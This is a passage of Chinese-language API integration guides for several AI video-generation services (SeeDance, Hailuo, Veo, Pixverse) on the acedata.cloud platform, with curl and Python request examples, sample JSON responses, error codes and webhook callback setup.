400 token_mismatched：Bad request, possibly due to missing or invalid parameters.
400 api_not_implemented：Bad request, possibly due to missing or invalid parameters.
401 invalid_token：Unauthorized, invalid or missing authorization token.
429 too_many_requests：Too many requests, you have exceeded the rate limit.
500 api_error：Internal server error, something went wrong on the server.

错误响应示例

{
  "success": false,
  "error": {
    "code": "api_error",
    "message": "fetch failed"
  },
  "trace_id": "2cf86e86-22a4-46e1-ac2f-032c0f2a4e89"
}

结论

通过本文档，您已经了解了如何使用 Producer Audios Generation API 可通过输入提示词来生成音乐。希望本文档能帮助您更好地对接和使用该 API。如有任何问题，请随时联系我们的技术支持团队。

作者崔庆才发表于 2026-01-01 阅读次数：本文字数： 26k 阅读时长 ≈ 23 分钟

SeeDance SeeDance Videos Generation API 对接说明

本文将介绍一种 SeeDance Videos Generation API 对接说明，它是可以通过输入自定义参数来生成SeeDance官方的视频。

申请流程

要使用 API，需要先到 SeeDance Videos Generation API 对应页面申请对应的服务，进入页面之后，点击「Acquire」按钮，如图所示：

如果你尚未登录或注册，会自动跳转到登录页面邀请您来注册和登录，登录注册之后会自动返回当前页面。

在首次申请时会有免费额度赠送，可以免费使用该 API。

基本使用

首先先了解下基本的使用方式，就是输入提示词 content.text、类型content.type=text 以及模型 model，便可获得处理后的结果，具体的内容如下：

可以看到这里我们设置了 Request Headers，包括：

accept：想要接收怎样格式的响应结果，这里填写为 application/json，即 JSON 格式。
authorization：调用 API 的密钥，申请之后可以直接下拉选择。

另外设置了 Request Body，包括：

model：生成视频的模型，主要有doubao-seedance-1-0-pro-250528、doubao-seedance-1-0-pro-fast-251015,doubao-seedance-1-5-pro-251215,doubao-seedance-1-0-lite-t2v-250428,doubao-seedance-1-0-lite-i2v-250428
context：content的type可以是text，也可以是image_url, image_url支持图片链接和base64数组两种，image_url和text参数互斥。
service_tier：有default和flex两种。
return_last_frame：是否返回最后一帧
execution_expires_after：执行超时时间。
callback_url：需要回调结果的URL。

选择之后，可以发现右侧也生成了对应代码，如图所示：

点击「Try」按钮即可进行测试，如上图所示，这里我们就得到了如下结果：

{
  "success": true,
  "task_id": "ec22ae22-0140-4033-8c86-a48b536da595",
  "trace_id": "1cc87db0-8ee5-4436-969b-35cc571a9fd5",
  "data": {
    "task_id": "cgt-20251222005129-62fhb",
    "status": "succeeded",
    "video_url": "https://platform.cdn.acedata.cloud/seedance/f592800a-b87c-4705-8796-cbb8018cae35.mp4",
    "model": "doubao-seedance-1-0-pro-250528"
  }
}

返回结果一共有多个字段，介绍如下：

success，此时视频生成任务的状态情况。
task_id，此时视频生成任务ID。
trace_id，此时视频生成跟踪ID。
data，此时视频生成任务的结果列表。
- task_id，此时视频生成任务的服务器端ID。
- video_url，此时视频生成任务的视频链接。
- status，此时视频生成任务的状态。
- model，生成视频使用的模型。

可以看到我们得到了满意的视频信息，我们只需要根据结果中 data 的视频链接地址获取生成的SeeDance视频即可。

另外如果想生成对应的对接代码，可以直接复制生成，例如 CURL 的代码如下：

curl -X POST 'https://api.acedata.cloud/seedance/videos' \
-H 'authorization: Bearer ${bearer_token}' \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-d '{
  "content": [{"text":"A kitten yawning at the camera. --rs 720p --rt 16:9 --dur 5 --fps 24 --wm true --seed 11 --cf false","type":"text"}],
  "model": "doubao-seedance-1-0-pro-250528"
}'

图生视频首帧

如果想图生视频任务，首先context参数需要选择image_url，并在其子节点url必须传入参考图片链接或者base64编码，请遵循此格式data:image/<图片格式>;base64,，注意 <图片格式> 需小写，如 data:image/png;base64,{base64_image}，就可以指定如下内容：

image_url：该图生视频任务采用的参考图链接。

对应的代码：

import requests

url = "https://api.acedata.cloud/seedance/videos"

headers = {
    "accept": "application/json",
    "authorization": "Bearer {token}",
    "content-type": "application/json"
}

payload = {
    "content": [
        {
            "type": "image_url",
            "image_url": {
                "url": "https://ark-project.tos-cn-beijing.volces.com/doc_image/i2v_foxrgirl.png"
            }
        },
        {
            "type": "text",
            "text": "A girl holds a fox in her arms. She opens her eyes and gazes tenderly at the camera, while the fox affectionately holds her back. As the camera slowly pulls away, her hair is gently blown by the wind. --ratio adaptive  --dur 5"
        }
    ],
    "model": "doubao-seedance-1-0-pro-250528"
}

response = requests.post(url, json=payload, headers=headers)
print(response.text)

点击运行，可以发现会立即得到一个结果，如下：

{
    "success": true,
    "task_id": "dc7cceb5-3c12-4de7-a5f4-abcbba3e8e39",
    "trace_id": "b3b09de3-b7fa-4bb0-88b5-aad4b4a96fd4",
    "data": {
        "task_id": "cgt-20251222072003-x2259",
        "status": "succeeded",
        "video_url": "https://platform.cdn.acedata.cloud/seedance/6afb78b8-5ba8-424f-adcd-69423a700b50.mp4",
        "model": "doubao-seedance-1-0-pro-250528"
    }
}

可以看到，生成的效果是图生建视频的，结果与上文类似。

图生视频首尾帧

如果想图生视频首尾帧，首先参数content必须传入类型image_url,并且分别设置role为first_frame和last_frame，就可以指定如下内容：

role：指定首帧或者尾帧。
image_url
- url 图片链接
  同时 content 还需要输入类型text作为prompt提示词

对应的代码：

import requests

url = "https://api.acedata.cloud/sora/videos"

headers = {
    "accept": "application/json",
    "authorization": "Bearer {token}",
    "content-type": "application/json"
}

payload = {
   "model": "doubao-seedance-1-0-pro-250528",
    "content": [
         {
            "type": "text",
            "text": "360-degree shot"
        },
        {
            "type": "image_url",
            "image_url": {
                "url": "https://ark-project.tos-cn-beijing.volces.com/doc_image/seepro_first_frame.jpeg"
            },
            "role": "first_frame"
        },
        {
            "type": "image_url",
            "image_url": {
                "url": "https://ark-project.tos-cn-beijing.volces.com/doc_image/seepro_last_frame.jpeg"
            },
            "role": "last_frame"
        }
    ]
}

response = requests.post(url, json=payload, headers=headers)
print(response.text)

点击运行，可以发现会立即得到一个结果，如下：

{
    "success": true,
    "task_id": "f7096c6c-9430-4392-8201-d259632d7afd",
    "trace_id": "4a4a3721-00fb-43d2-aff2-3b516ac01a8a",
    "data": {
        "task_id": "cgt-20251222073134-54qcw",
        "status": "succeeded",
        "video_url": "https://platform.cdn.acedata.cloud/seedance/95f9f5f0-fc50-4c71-bc6f-e154582c141e.mp4",
        "model": "doubao-seedance-1-0-pro-250528"
    }
}

可以看到，生成的效果是角色生成视频，结果与上文类似。

异步回调

由于 SeeDance Videos Generation API生成的时间相对较长，大约需要 1-2 分钟，如果 API 长时间无响应，HTTP 请求会一直保持连接，导致额外的系统资源消耗，所以本 API 也提供了异步回调的支持。

整体流程是：客户端发起请求的时候，额外指定一个 callback_url 字段，客户端发起 API 请求之后，API 会立马返回一个结果，包含一个 task_id 的字段信息，代表当前的任务 ID。当任务完成之后，生成视频的结果会通过 POST JSON 的形式发送到客户端指定的 callback_url，其中也包括了 task_id 字段，这样任务结果就可以通过 ID 关联起来了。

输入callbacl_url点击运行，可以发现会立即得到一个结果，如下：

1
2
3

{
  "task_id": "f7096c6c-9430-4392-8201-d259632d7afd"
}

当任务完成的时候，平台会将最后的结果以POST的形式推送到 callback_url的网址

内容如下：

{
    "success": true,
    "task_id": "f7096c6c-9430-4392-8201-d259632d7afd",
    "trace_id": "4a4a3721-00fb-43d2-aff2-3b516ac01a8a",
    "data": {
        "task_id": "cgt-20251222073134-54qcw",
        "status": "succeeded",
        "video_url": "https://platform.cdn.acedata.cloud/seedance/95f9f5f0-fc50-4c71-bc6f-e154582c141e.mp4",
        "model": "doubao-seedance-1-0-pro-250528"
    }
}

可以看到结果中有一个 task_id 字段，其他的字段都和上文类似，通过该字段即可实现任务的关联。

错误处理

在调用 API 时，如果遇到错误，API 会返回相应的错误代码和信息。例如：

400 token_mismatched：Bad request, possibly due to missing or invalid parameters.
400 api_not_implemented：Bad request, possibly due to missing or invalid parameters.
401 invalid_token：Unauthorized, invalid or missing authorization token.
429 too_many_requests：Too many requests, you have exceeded the rate limit.
500 api_error：Internal server error, something went wrong on the server.

错误响应示例

{
  "success": false,
  "error": {
    "code": "api_error",
    "message": "fetch failed"
  },
  "trace_id": "2cf86e86-22a4-46e1-ac2f-032c0f2a4e89"
}

结论

通过本文档，您已经了解了如何使用 SeeDance Videos Generation API 可通过输入提示词以及参考图片来生成视频。希望本文档能帮助您更好地对接和使用该 API。如有任何问题，请随时联系我们的技术支持团队。

作者崔庆才发表于 2025-12-31 阅读次数：本文字数： 6k 阅读时长 ≈ 5 分钟

API Hailuo Videos Generation API 对接说明

本文将介绍一种 Hailuo Videos Generation API 对接说明，它是可以通过输入自定义参数来生成Hailuo官方的视频。

接下来介绍下 Hailuo Videos Generation API 的对接说明。

申请流程

要使用 API，需要先到 Hailuo Videos Generation API 对应页面申请对应的服务，进入页面之后，点击「Acquire」按钮，如图所示：

如果你尚未登录或注册，会自动跳转到登录页面邀请您来注册和登录，登录注册之后会自动返回当前页面。

在首次申请时会有免费额度赠送，可以免费使用该 API。

基本使用

首先先了解下基本的使用方式，就是输入提示词 prompt、生成行为 action、首帧参考图片 first_image_url 以及模型 model，便可获得处理后的结果，首先需要简单地传递一个 action 字段，它的值为 generate，然后我们还需要输入模型，目前主要有图生视频模型 minimax-i2v 和文生视频模型 minimax-t2v，具体的内容如下：

可以看到这里我们设置了 Request Headers，包括：

accept：想要接收怎样格式的响应结果，这里填写为 application/json，即 JSON 格式。
authorization：调用 API 的密钥，申请之后可以直接下拉选择。

另外设置了 Request Body，包括：

model：生成视频的模型，主要有图生视频模型 minimax-i2v 和文生视频模型 minimax-t2v 俩种。
action：此次视频生成任务的行为。
first_image_url：当选择图生视频模型 minimax-i2v 就必须需要上传的首帧参考图片链接，不支持Base64编码。
prompt：提示词。
callback_url：需要回调结果的URL。

选择之后，可以发现右侧也生成了对应代码，如图所示：

点击「Try」按钮即可进行测试，如上图所示，这里我们就得到了如下结果：

{
  "success": true,
  "task_id": "baf1034c-684c-46be-ae6d-89ebb89b690d",
  "trace_id": "3221eb74-1a25-447a-ba69-7d9b310e306c",
  "data": [
    {
      "id": "0pv8yhe4fdrge0cmckpv23pd2g",
      "model": "minimax-t2v",
      "prompt": "Internal heat",
      "video_url": "https://file.aigpai.com/czjl/qoueLWBokF3ud6tdVD6VJTZuXTnK5HaMO2qAOS46Ef8VSBFUA/tmp9e3u11c1.output.mp4",
      "state": "succeeded"
    }
  ]
}

返回结果一共有多个字段，介绍如下：

success，此时视频生成任务的状态情况。
task_id，此时视频生成任务ID。
trace_id，此时视频生成跟踪ID。
data，此时视频生成任务的结果列表。
- id，此时视频生成任务的视频ID。
- prompt，此时视频生成任务的提示词。
- model，此时视频生成任务的封面链接。
- video_url，此时视频生成任务的视频链接。
- state，此时视频生成任务的状态。

可以看到我们得到了满意的视频信息，我们只需要根据结果中 data 的视频链接地址获取生成的Hailuo视频即可。

另外如果想生成对应的对接代码，可以直接复制生成，例如 CURL 的代码如下：

curl -X POST 'https://api.acedata.cloud/hailuo/videos' \
-H 'accept: application/json' \
-H 'authorization: Bearer {token}' \
-H 'content-type: application/json' \
-d '{
  "action": "generate",
  "prompt": "Internal heat"
}'

异步回调

由于 Hailuo Videos Generation API生成的时间相对较长，大约需要 1-2 分钟，如果 API 长时间无响应，HTTP 请求会一直保持连接，导致额外的系统资源消耗，所以本 API 也提供了异步回调的支持。

整体流程是：客户端发起请求的时候，额外指定一个 callback_url 字段，客户端发起 API 请求之后，API 会立马返回一个结果，包含一个 task_id 的字段信息，代表当前的任务 ID。当任务完成之后，生成视频的结果会通过 POST JSON 的形式发送到客户端指定的 callback_url，其中也包括了 task_id 字段，这样任务结果就可以通过 ID 关联起来了。

下面我们通过示例来了解下具体怎样操作。

首先，Webhook 回调是一个可以接收 HTTP 请求的服务，开发者应该替换为自己搭建的 HTTP 服务器的 URL。此处为了方便演示，使用一个公开的 Webhook 样例网站 https://webhook.site/，打开该网站即可得到一个 Webhook URL，如图所示：

将此 URL 复制下来，就可以作为 Webhook 来使用，此处的样例为 https://webhook.site/580b81f5-596e-4321-b03f-606770b0bb83。

接下来，我们可以设置字段 callback_url 为上述 Webhook URL，同时填入相应的参数，具体的内容如图所示：

点击运行，可以发现会立即得到一个结果，如下：

1
2
3

{
  "task_id": "05aff65c-5e84-442b-8e29-3a5d27130840"
}

稍等片刻，我们可以在 https://webhook.site/580b81f5-596e-4321-b03f-606770b0bb83 上观察到生成视频的结果，如图所示：

内容如下：

{
    "success": true,
    "task_id": "05aff65c-5e84-442b-8e29-3a5d27130840",
    "trace_id": "b9856b8a-725d-45c9-befe-e789d9fd9ffb",
    "data": [
        {
            "id": "t80jhsf96srg80cmcm6b0rk8gm",
            "model": "minimax-t2v",
            "prompt": "Internal heat",
            "video_url": "https://file.aigpai.com/czjl/YPaUz2DcwpJqItTXAG9XHAoEoj3dbF0XPU69LT5nefCMzBFUA/tmp8s_59jez.output.mp4",
            "state": "succeeded"
        }
    ]
}

可以看到结果中有一个 task_id 字段，其他的字段都和上文类似，通过该字段即可实现任务的关联。

错误处理

在调用 API 时，如果遇到错误，API 会返回相应的错误代码和信息。例如：

400 token_mismatched：Bad request, possibly due to missing or invalid parameters.
400 api_not_implemented：Bad request, possibly due to missing or invalid parameters.
401 invalid_token：Unauthorized, invalid or missing authorization token.
429 too_many_requests：Too many requests, you have exceeded the rate limit.
500 api_error：Internal server error, something went wrong on the server.

错误响应示例

{
  "success": false,
  "error": {
    "code": "api_error",
    "message": "fetch failed"
  },
  "trace_id": "2cf86e86-22a4-46e1-ac2f-032c0f2a4e89"
}

结论

通过本文档，您已经了解了如何使用 Hailuo Videos Generation API 可通过输入提示词以及首帧参考图片来生成视频。希望本文档能帮助您更好地对接和使用该 API。如有任何问题，请随时联系我们的技术支持团队。

作者崔庆才发表于 2025-08-06 阅读次数：本文字数： 3.5k 阅读时长 ≈ 3 分钟

API Veo Videos Generation API 对接说明

本文将介绍一种 Veo Videos Generation API 对接说明，它是可以通过输入自定义参数来生成Veo官方的视频。

接下来介绍下 Veo Videos Generation API 的对接说明。

申请流程

要使用 API，需要先到 Veo Videos Generation API 对应页面申请对应的服务，进入页面之后，点击「Acquire」按钮，如图所示：

如果你尚未登录或注册，会自动跳转到登录页面邀请您来注册和登录，登录注册之后会自动返回当前页面。

在首次申请时会有免费额度赠送，可以免费使用该 API。

基本使用

首先先了解下基本的使用方式，就是输入提示词 prompt、生成行为 action、首尾帧参考图片数组 image_urls 以及模型 model，便可获得处理后的结果，首先需要简单地传递一个 action 字段，它的值为 text2video，它主要包含三种行为：文生视频（text2video）、图生视频（image2video）、获取1080p视频（get_1080p），然后我们还需要输入模型 model，目前主要有 veo2 、veo2-fast、veo3 和 veo3-fast 模型，具体的内容如下：

可以看到这里我们设置了 Request Headers，包括：

accept：想要接收怎样格式的响应结果，这里填写为 application/json，即 JSON 格式。
authorization：调用 API 的密钥，申请之后可以直接下拉选择。

另外设置了 Request Body，包括：

model：生成视频的模型，主要有 veo2 、veo2-fast、veo3 和 veo3-fast 模型。
action：此次视频生成任务的行为，主要包含三种行为，分别为：文生视频（text2video）、图生视频（image2video）、获取1080p视频（get_1080p）。
image_urls：当选择图生视频行为 image2video 就必须需要上传的首尾帧参考图片链接。
prompt：提示词。
callback_url：需要回调结果的URL。

选择之后，可以发现右侧也生成了对应代码，如图所示：

点击「Try」按钮即可进行测试，如上图所示，这里我们就得到了如下结果：

{
  "success": true,
  "task_id": "dd01fc69-e1f7-4b68-aa8c-463f6b748d11",
  "trace_id": "9906dac0-1516-41dc-9fe3-067ca1ba8269",
  "data": [
    {
      "id": "253eedc47f1c4eb2a370ed2312168f4b",
      "video_url": "https://platform.cdn.acedata.cloud/veo/dd01fc69-e1f7-4b68-aa8c-463f6b748d11.mp4",
      "created_at": "2025-07-25 16:07:43",
      "complete_at": "2025-07-25 16:10:28",
      "state": "succeeded"
    }
  ]
}

返回结果一共有多个字段，介绍如下：

success，此时视频生成任务的状态情况。
task_id，此时视频生成任务ID。
data，此时视频生成任务的结果。
- id，此时视频生成任务的视频ID。
- video_url，此时视频生成任务的视频链接。
- created_at，此时视频生成任务的创建时间。
- complete_at，此时视频生成任务的完成时间。
- state，此时视频生成任务的状态。

可以看到我们得到了满意的视频信息，我们只需要根据结果中 data 的视频链接地址获取生成的Veo视频即可。

另外如果想生成对应的对接代码，可以直接复制生成，例如 CURL 的代码如下：

curl -X POST 'https://api.acedata.cloud/veo/videos' \
-H 'accept: application/json' \
-H 'authorization: Bearer {token}' \
-H 'content-type: application/json' \
-d '{
  "action": "text2video",
  "model": "veo2",
  "prompt": "White ceramic coffee mug on glossy marble countertop with morning window light. Camera slowly rotates 360 degrees around the mug, pausing briefly at the handle."
}'

图生视频功能

如果想根据首尾帧图片进行生成视频的话，可以将参数 action 设置为 image2video ，并且输入首尾帧图片链接数组 image_urls。

接下来我们要必须填下一步需要扩展的提示词来自定义生成视频，就可以指定如下内容：

model：生成视频的模型，主要有veo2 、veo2-fast、veo3 和 veo3-fast。
image_urls：当选择图生视频行为 image2video 就必须需要上传的首尾帧参考图片链接。
prompt：提示词。

填写样例如下：

填写完毕之后自动生成了代码如下：

对应的 Python 代码：

import requests

url = "https://api.acedata.cloud/veo/videos"

headers = {
    "accept": "application/json",
    "authorization": "Bearer {token}",
    "content-type": "application/json"
}

payload = {
    "action": "image2video",
    "model": "veo2",
    "prompt": "Let it dance",
    "image_urls": ["https://cdn.acedata.cloud/7p1jhy.png"]
}

response = requests.post(url, json=payload, headers=headers)
print(response.text)

点击运行，可以发现会得到一个结果，如下：

{
  "success": true,
  "task_id": "98e309f3-35bc-438d-8cb3-4015fc864b87",
  "trace_id": "8bc68066-36de-41ef-ae5e-b7d61ff6aee8",
  "data": [
    {
      "id": "59f12222b1fa4fbe9331ff2400ad1583",
      "video_url": "https://platform.cdn.acedata.cloud/veo/98e309f3-35bc-438d-8cb3-4015fc864b87.mp4",
      "created_at": "2025-07-25 16:13:07",
      "complete_at": "2025-07-25 16:16:12",
      "state": "succeeded"
    }
  ]
}

可以看出，结果内容与上文的是一致的，这也就实现视频的图生视频功能。

图生视频功能

如果想对已经生成的Veo视频获取1080p的话，可以将参数 action 设置为 get_1080p ，并且输入需要获取1080p的视频的 ID，视频 ID 的获取是根据基本使用来获取，如下图所示：

这时候可以看到视频的 ID 为：

1	"id": "59f12222b1fa4fbe9331ff2400ad1583"

注意，这里的视频中 video_id 是生成后视频的 ID，如果你不知道如何生成视频，可以参考上文的基本使用来生成视频。

接下来我们要必须填下一步需要扩展的提示词来自定义生成视频，就可以指定如下内容：

model：生成视频的模型，主要有 veo2 、veo2-fast、veo3 和 veo3-fast。
video_id：参考的视频ID，用于获取1080p的视频。

填写样例如下：

填写完毕之后自动生成了代码如下：

点击运行，可以发现会得到一个结果，如下：

{
  "success": true,
  "task_id": "47a51cfe-2e24-4aba-93b3-546c2dc52984",
  "trace_id": "a8922eec-6f50-4f77-8104-00ded071d59d",
  "data": [
    {
      "id": "59f12222b1fa4fbe9331ff2400ad1583",
      "video_url": "https://platform.cdn.acedata.cloud/veo/47a51cfe-2e24-4aba-93b3-546c2dc52984.mp4",
      "created_at": "2025-07-25 16:13:07",
      "complete_at": "2025-07-25 16:16:12",
      "state": "succeeded"
    }
  ]
}

可以看出，结果内容与上文的是一致的，这也就实现视频的获取1080p视频功能。

异步回调

由于 Veo Videos Generation API生成的时间相对较长，大约需要 1-2 分钟，如果 API 长时间无响应，HTTP 请求会一直保持连接，导致额外的系统资源消耗，所以本 API 也提供了异步回调的支持。

整体流程是：客户端发起请求的时候，额外指定一个 callback_url 字段，客户端发起 API 请求之后，API 会立马返回一个结果，包含一个 task_id 的字段信息，代表当前的任务 ID。当任务完成之后，生成视频的结果会通过 POST JSON 的形式发送到客户端指定的 callback_url，其中也包括了 task_id 字段，这样任务结果就可以通过 ID 关联起来了。

下面我们通过示例来了解下具体怎样操作。

首先，Webhook 回调是一个可以接收 HTTP 请求的服务，开发者应该替换为自己搭建的 HTTP 服务器的 URL。此处为了方便演示，使用一个公开的 Webhook 样例网站 https://webhook.site/，打开该网站即可得到一个 Webhook URL，如图所示：

将此 URL 复制下来，就可以作为 Webhook 来使用，此处的样例为 https://webhook.site/aed5cd28-f8aa-4dca-9480-8ec9b42137dc。

接下来，我们可以设置字段 callback_url 为上述 Webhook URL，同时填入相应的参数，具体的内容如图所示：

点击运行，可以发现会立即得到一个结果，如下：

1
2
3

{
  "task_id": "1ebe4f2b-59ba-4385-a4ea-0ce8a3fe12ed"
}

稍等片刻，我们可以在 https://webhook.site/aed5cd28-f8aa-4dca-9480-8ec9b42137dc 上观察到生成视频的结果，如图所示：

内容如下：

{
  "success": true,
  "task_id": "1ebe4f2b-59ba-4385-a4ea-0ce8a3fe12ed",
  "trace_id": "d1d53c04-58c5-4c40-bb63-f00188540e56",
  "data": [
    {
      "id": "2f43ceed37944b4d836e1a1899dad0a1",
      "video_url": "https://platform.cdn.acedata.cloud/veo/1ebe4f2b-59ba-4385-a4ea-0ce8a3fe12ed.mp4",
      "created_at": "2025-07-25 17:19:20",
      "complete_at": "2025-07-25 17:21:45",
      "state": "succeeded"
    }
  ]
}

可以看到结果中有一个 task_id 字段，其他的字段都和上文类似，通过该字段即可实现任务的关联。

错误处理

在调用 API 时，如果遇到错误，API 会返回相应的错误代码和信息。例如：

400 token_mismatched：Bad request, possibly due to missing or invalid parameters.
400 api_not_implemented：Bad request, possibly due to missing or invalid parameters.
401 invalid_token：Unauthorized, invalid or missing authorization token.
429 too_many_requests：Too many requests, you have exceeded the rate limit.
500 api_error：Internal server error, something went wrong on the server.

错误响应示例

{
  "success": false,
  "error": {
    "code": "api_error",
    "message": "fetch failed"
  },
  "trace_id": "2cf86e86-22a4-46e1-ac2f-032c0f2a4e89"
}

结论

通过本文档，您已经了解了如何使用 Veo Videos Generation API 可通过输入提示词以及首帧参考图片来生成视频。希望本文档能帮助您更好地对接和使用该 API。如有任何问题，请随时联系我们的技术支持团队。

作者崔庆才发表于 2025-08-05 阅读次数：本文字数： 5.7k 阅读时长 ≈ 5 分钟

API Pixverse 视频生成 API 对接说明

申请和使用

要使用 Pixverse Videos Generation API，首先可以到 Pixverse Videos Generation API 页面点击「Acquire」按钮，获取请求所需要的凭证：

如果你尚未登录或注册，会自动跳转到登录页面邀请您来注册和登录，登录注册之后会自动返回当前页面。

在首次申请时会有免费额度赠送，可以免费使用该 API。

基本使用

可以根据提示词来生成视频，比如可以输入 quiver，如图所示：

生成的代码如下：

可以点击「Try」按钮直接测试 API，稍等 1-2 分钟，结果如下：

{
  "success": true,
  "task_id": "69e677ca-f1de-419f-99a4-cb39ea0cb5fc",
  "trace_id": "e544f904-ac13-4b42-a26e-2de69d9ac06b",
  "data": [
    {
      "id": 317982208110208,
      "first_frame": "",
      "video_width": 0,
      "video_height": 0,
      "prompt": "quiver",
      "model": "v3.5",
      "quality": "360p",
      "motion": "normal",
      "video_url": "https://media.pixverse.ai/pixverse%2Fmp4%2Fmedia%2Fweb%2F77e48783-3dc9-48ab-84a0-0e310ff9b83d_seed0.mp4",
      "template_id": 0,
      "template_name": "",
      "style": "",
      "aspect_ratio": "16:9",
      "duration": 5,
      "extended": 0,
      "last_frame": "",
      "seed": 0,
      "asset_id": 0,
      "asset_name": ""
    }
  ]
}

可以看到这时候我们就得到了一个视频的内容，包括视频ID、视频链接、视频清晰度、视频时长等内容。

字段说明如下：

success：生成是否成功，如果成功则为 true，否则为 false
task_id：此次生成任务的ID
trace_id：此次生成任务的追踪ID
data：是一个列表，包含了生成的视频的详细信息。
- id：生成视频的唯一ID，后续可以根据此ID进行扩展生成
- first_frame：视频的首帧图片链接
- last_frame：视频的尾帧图片链接
- video_width：此次视频结果的宽度
- video_height：此次视频结果的长度
- prompt：此次视频生成任务的提示词
- model：此次视频生成任务采用的模型
- video_url：此次视频生成任务的视频链接
- template_id：视频采用的模版特效ID
- template_name：视频采用的模版特效名称
- asset_id：视频采用的角色ID
- asset_name：视频采用的角色名称
- style：此次视频生成任务的风格
- aspect_ratio：此次视频的尺寸大小
- extended：此次视频是否为扩展生成的，0为不是扩展生成的，反之为扩展生成的

自定义首尾帧生成视频

如果想自定义首尾帧生成视频，可以输入首尾帧图片链接：

这时候 frame 字段可以传入类似如下内容：

首帧图片
尾帧图片

接下来我们要根据歌词、标题、风格自定义生成歌曲，就可以指定如下内容：

action：此次视频生成任务的行为，分为俩种：生成视频 action、扩展视频 extend
prompt：此次视频生成任务的提示词。
frame：此次视频生成的首尾帧视频链接数组。

填写样例如下：

填写完毕之后自动生成了代码如下：

对应的Shell代码：

curl -X POST 'https://api.acedata.cloud/pixverse/videos' \
-H 'accept: application/json' \
-H 'authorization: Bearer {token}' \
-H 'content-type: application/json' \
-d '{
  "action": "generate",
  "prompt": "gradation",
  "frame": ["https://cdn.acedata.cloud/c7zzmb.png","https://cdn.acedata.cloud/fqd8br.png"]
}'

测试允许，生成的效果是类似的。

自定义视频模板特效生成

如果想使用特定的视频模板特效来生成视频的话，我们只需要添加一个模板ID字段 template_id 来指定模板特效，我们提供了以下几个模板特效，
具体的模板特效如下图所示：

[
    {
        "display_name": "Muscle Surge",
        "workflow_tag": "muscle_241128",
        "template_id": 308621408717184,
        "thumbnail_path": "https://media.pixverse.ai/asset%2Ftemplate%2Fwithbaby.gif",
        "thumbnail_video_path": "",
        "marker": "hot",
        "created_at": "2024-11-28T17:53:21Z",
        "updated_at": "2024-12-25T10:19:28Z",
        "display_prompt": "Show off your strong muscles and have everyone hooked.",
        "i18n_json": "{\"zh-CN\":{\"display_name\":\"成为肌肉猛男\",\"display_prompt\":\"体验猛男快乐\"}}",
        "example_list": "[{\"img_id\":113750602,\"img_url\":\"https://media.pixverse.ai/upload%2F920dc791-8c9f-4518-8761-82958a827190.png\"},{\"img_id\":113750690,\"img_url\":\"https://media.pixverse.ai/upload%2Fddd29e75-beeb-461c-9388-3e14c2709e73.png\"},{\"img_id\":113750791,\"img_url\":\"https://media.pixverse.ai/upload%2Ff2853009-8238-4e0f-93ec-cfc68fee28b7.png\"}]",
        "qualities": [
            "360p",
            "540p",
            "720p",
            "1080p"
        ]
    },
    {
        "display_name": "Hug Your Love",
        "workflow_tag": "hug_love_241030",
        "template_id": 303624424723200,
        "thumbnail_path": "https://media.pixverse.ai/asset%2Ftemplate%2Fhug2.gif",
        "thumbnail_video_path": "",
        "marker": "hot",
        "created_at": "2024-10-31T12:07:47Z",
        "updated_at": "2025-01-06T05:32:42Z",
        "display_prompt": "Hug each other\t",
        "i18n_json": "{\"zh-CN\":{\"display_name\":\"爱的抱抱\",\"display_prompt\":\"互相拥抱在一起\"}}",
        "example_list": "[{\"img_id\":113741803,\"img_url\":\"https://media.pixverse.ai/upload%2Fb2626bc2-050d-4ea6-a864-e2054c012df5.png\"},{\"img_id\":113750690,\"img_url\":\"https://media.pixverse.ai/upload%2Fddd29e75-beeb-461c-9388-3e14c2709e73.png\"}]",
        "qualities": [
            "360p",
            "540p",
            "720p",
            "1080p"
        ]
    },
    {
        "display_name": "Alive Art",
        "workflow_tag": "alive_art_241028",
        "template_id": 302325299721280,
        "thumbnail_path": "https://media.pixverse.ai/asset%2Ftemplate%2Faliveart.gif",
        "thumbnail_video_path": "",
        "marker": "default",
        "created_at": "2024-10-24T03:55:29Z",
        "updated_at": "2025-01-06T05:32:53Z",
        "display_prompt": "The [OBJECT] comes to life and walks out of the [SCENE]",
        "i18n_json": "{\"zh-CN\":{\"display_name\":\"活灵活现\",\"display_prompt\":\"它活了！\"}}",
        "example_list": "",
        "qualities": [
            "360p",
            "540p",
            "720p",
            "1080p"
        ]
    },
    {
        "display_name": "Sheep Curls",
        "workflow_tag": "sheep_241208",
        "template_id": 310371322329472,
        "thumbnail_path": "https://media.pixverse.ai/asset%2Ftemplate%2FSheepCurls.gif",
        "thumbnail_video_path": "",
        "marker": "new",
        "created_at": "2024-12-08T15:14:11Z",
        "updated_at": "2024-12-25T10:19:28Z",
        "display_prompt": "Change hairstyle for a better mood",
        "i18n_json": "{\"zh-CN\":{\"display_name\":\"万物皆可羊毛卷\",\"display_prompt\":\"心情不好，换个发型看看\"}}",
        "example_list": "[{\"img_id\":113741803,\"img_url\":\"https://media.pixverse.ai/upload%2Fb2626bc2-050d-4ea6-a864-e2054c012df5.png\"},{\"img_id\":113750690,\"img_url\":\"https://media.pixverse.ai/upload%2Fddd29e75-beeb-461c-9388-3e14c2709e73.png\"}]",
        "qualities": [
            "360p",
            "540p",
            "720p",
            "1080p"
        ]
    },
    {
        "display_name": "Sailor Moon",
        "workflow_tag": "meishaonv_241225",
        "template_id": 313359138372032,
        "thumbnail_path": "https://media.pixverse.ai/asset%2Ftemplate%2Fmeishaonv2.gif",
        "thumbnail_video_path": "",
        "marker": "",
        "created_at": "2024-12-25T12:29:05Z",
        "updated_at": "2025-01-06T05:32:33Z",
        "display_prompt": "Moon Prism Power, Make Up!",
        "i18n_json": "{\"zh-CN\":{\"display_name\":\"成为美少女战士\",\"display_prompt\":\"月之水晶力量，变身！\"}}",
        "example_list": "",
        "qualities": [
            "360p",
            "540p",
            "720p",
            "1080p"
        ]
    },
    {
        "display_name": "Black Myth: Wukong",
        "workflow_tag": "heiwukong_241225",
        "template_id": 313359209531840,
        "thumbnail_path": "https://media.pixverse.ai/asset%2Ftemplate%2Fmonkey.gif",
        "thumbnail_video_path": "",
        "marker": "",
        "created_at": "2024-12-25T12:29:40Z",
        "updated_at": "2025-01-06T05:32:25Z",
        "display_prompt": "I am Sun Wukong, the Victorious Fighting Buddha!",
        "i18n_json": "{\"zh-CN\":{\"display_name\":\"黑悟空引擎\",\"display_prompt\":\"放马西行，直面天命！\"}}",
        "example_list": "",
        "qualities": [
            "360p",
            "540p",
            "720p",
            "1080p"
        ]
    },
    {
        "display_name": "Santa's Secret Gifts",
        "workflow_tag": "santa_gift_241213",
        "template_id": 311521768592256,
